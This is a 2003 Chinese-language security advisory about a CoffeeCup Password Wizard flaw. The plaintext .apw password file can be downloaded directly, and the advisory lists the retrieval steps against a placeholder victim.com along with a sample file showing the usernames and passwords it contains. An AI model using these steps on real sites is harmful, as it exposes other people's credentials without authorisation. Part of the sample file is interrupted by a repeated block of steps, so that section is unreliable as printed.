积极预防 及时发现
快速响应 力保恢复
CoffeeCup Password Wizard 存在信息泄露缺陷 (MS,缺陷)
发布时间:2003-03-04 信息来源:管理员

涉及程序: Password Wizard 所有版本 描述: CoffeeCup Password Wizard 存在信息泄露缺陷 详细: CoffeeCup Password Wizard 是一款非常容易使用的网页保护程序,通过建立用户名和口令来保护网站信息,如果访问者输入正确的用户名和口令,则链接到指定的网页或者框架(frame),否则重定向到另一个URL。 CoffeeCup Password Wizard 中存在信息泄露缺陷,攻击者能够很容易的得到用户名和密码,并利用URL直接访问参数选择。攻击者通过登录到注册面板,在用于产生注册的.swf文件的页面查看其HTML源代码,就能获得用户的信息。例如: 登录到: https://www.victim.com/billing/ 查看源代码: <...> ID=billing WIDTH=146 HEIGHT=125> <...> (https://www.victim.com/billing/billing.swf) 利用extension .apw文件调用出密码文件。 查看或下载文件: https://www.victim.com/billing/billing.apw (APW 是CoffeeCup Password Wizard 文件) 利用任何文本程序都可以打开密码文件。 密码文件示例: --------- billing.apw ----------- COFFEECUP PASSWORD WIZARD FILE WWW.COFFEECUP.COM PLEASE DO NOT EDIT!!!! MOVIE WIDTH:120 MOVIE HEIGHT:100 MOVIE FRAME RATE:0 MOVIE BK COLOR:> (https://www.victim.com/billing/billing.swf) 利用extension .apw文件调用出密码文件。 查看或下载文件: https://www.victim.com/billing/billing.apw (APW 是CoffeeCup Password Wizard 文件) 利用任何文本程序都可以打开密码文件。 密码文件示例: --------- billing.apw ----------- COFFEECUP PASSWORD WIZARD FILE WWW.COFFEECUP.COM PLEASE DO NOT EDIT!!!! MOVIE WIDTH:120 MOVIE HEIGHT:100 MOVIE FRAME RATE:0 MOVIE BK COLOR:$00ECECEC MOVIE DEFAULT URL: MOVIE DEFAULT FRAME: MOVIE SWF NAME:billing.swf MOVIE SWF PATH:C:\\Documents and Settings\\vhost\\Mis documentos\\Mis Webs\\victim.com\\new website project\\billing\MOVIE FONT NAME:MS Sans Serif MOVIE FONT SIZE:8 MOVIE FONT COLOR:clBlack MOVIE TRANSPARENT TRUE MOVIE VERTICAL TRUE USER BOX LEFT:2 USER BOX TOP:1 USER BOX WIDTH:116 USER BOX HEIGHT:34 USER BOX CAPTION:Username PASS BOX LEFT:2 PASS BOX TOP:36 PASS BOX WIDTH:116 PASS BOX HEIGHT:34 PASS BOX CAPTION:Password BUTTON LEFT:15 BUTTON TOP:78 BUTTON WIDTH:90 BUTTON HEIGHT:20 BUTTON PATH: BUTTON TX:1 BUTTON TY:1 ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm END 从billing.apw文件中获得: 用户名:anyweb 密码:xnet0305 URL选项面板:https://www.victim.com/billing/anyweb0001.htm 攻击方法: 登录到: https://www.victim.com/billing/ 查看源代码: <...> ID=billing WIDTH=146 HEIGHT=125> <...> (https://www.victim.com/billing/billing.swf) 利用extension .apw文件调用出密码文件。 查看或下载文件: https://www.victim.com/billing/billing.apw (APW 是CoffeeCup Password Wizard 文件) 利用任何文本程序都可以打开密码文件。 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.coffeecup.com/